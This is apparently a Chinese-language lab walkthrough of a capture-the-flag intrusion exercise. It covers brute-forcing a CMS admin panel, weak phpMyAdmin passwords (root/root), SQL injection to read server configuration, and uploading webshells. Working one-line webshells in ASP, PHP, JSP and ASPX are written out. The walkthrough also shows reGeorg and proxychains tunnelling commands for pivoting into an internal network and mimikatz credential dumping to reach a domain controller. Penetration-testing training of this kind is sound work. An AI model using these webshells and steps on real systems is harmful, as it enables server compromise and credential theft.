后台文件上传

  1. 使用御剑或Dirbuster等工具扫描网站后台目录,利用Burpsuite工具爆破网站后台用户名密码,获取cms的管理员密码登录后台。
  2. 构造php一句话木马,利用后台任意文件上传漏洞将木马上传到目标服务器,然后再使用中国菜刀连接一句话木马,获取目标服务器的webshell以便进行后续的操作。

一句话木马:

asp:

<%execute(request("value"))%>

php:

<?php @eval($_POST['flag']); ?>

jsp:

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

aspx:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

使用中国菜刀连接一句话木马

得到登录地址manager/login.php

以及myadmin

登陆myadmin为phpmyadmin

尝试弱口令root root

登陆成功后,查看数据库

得到Admin的md5密码,进行md5解密,得到登录密码进行登录

Sql注入

  1. 利用之前扫描目录得到的结果访问到测试的sql页面,利用SQL注入漏洞获得网站数据库信息
  2. 构造SQL注入语句读取webserver配置文件查看网站根目录,写入php一句话木马,获得webshell。

访问/sql目录,利用SQL注入漏洞获取网站数据库基本信息,如当前使用的数据库用户等。

利用SQL注入漏洞读取apache的配置文件,并通过配置文件中获取的网站根目录将一句话木马写入到网站目录中。

使用中国菜刀连接目标服务器上的一句话木马,查找网站根目录下文件中包含的flag值并提交

phpmyadmin写shell

  1. 利用之前扫描目录得到的结果访问到phpmyadmin的页面,利用弱口令登录到phpmyadmin服务中。
  2. 构造SQL语句读取webserver配置文件查看网站根目录,写入php一句话木马,获得webshell。

尝试弱口令登录到phpmyadmin服务中

读取httpd的配置文件找到网站的根目录,然后尝试写入一句话木马,写入创建webshell的命令,使用中国菜刀连接一句话木马。

在网站数据库中发现有flag表,读取到flag并提交

尝试的弱口令是 root root

扫描PC端并登陆

  1. 利用已经获取到权限的web机器,上传扫描脚本对内网中的其他主机进行扫描。
  2. 利用web代理工具代理访问内网的主机,使用之前数据库中获得的账号密码进行登录。

上传内网扫描的脚本到web的机器上,并对内网192.168.2.0/24段进行扫描

上传regeorg工具到web机器上开启代理服务

使用proxifier 工具代理远程连接访问登录到2.11上

读取C盘上根目录下的文件中的flag字符串,提交后该实验任务完成。

扫描脚本 RASscan.py

使用reGeorgSocksProxy开启代理

使用方法为在本地 cmd 运行python reGeorgSocksProxy.py

端口8000或8080……

开启proxifier

远程连接 192.168.2.11

方法为 运行->mstsc

reGeorgSocksProxy内网运用

https://www.jianshu.com/p/10de019c424c

1.上传reGeorg里合适的tunnel到边缘服务器
在这里插入图片描述
2.攻击机输入命令
python reGeorgSocksProxy.py -u http://192.168.1.102/conn.aspx (上传地址)
在这里插入图片描述
3.攻击机输入vim /etc/proxychains.conf ,按里面的说明进行设置proxychains
socks5 127.0.0.1 8888
在这里插入图片描述
4.使用proxychains直接代理连接目标服务器即可
proxychains rdesktop 10.10.10.1

抓取域控密码并登陆域控

  1. 利用已经登录到远程桌面的机器,上传mimikatz工具抓取机器内存中的密码。
  2. 利用抓取到的密码登录到另一台机器2.10中

实验工具

- mimikatz

- mstsc

使用mimikatz在之前远程桌面登陆的机器上抓取密码

使用抓取到的密码登录另一台机器2.10

将mimikatz上传到任务四中的192.168.1.11

管理员身份运行

使用命令

img

获取密码

img

远程登录192.168.1.10得到flag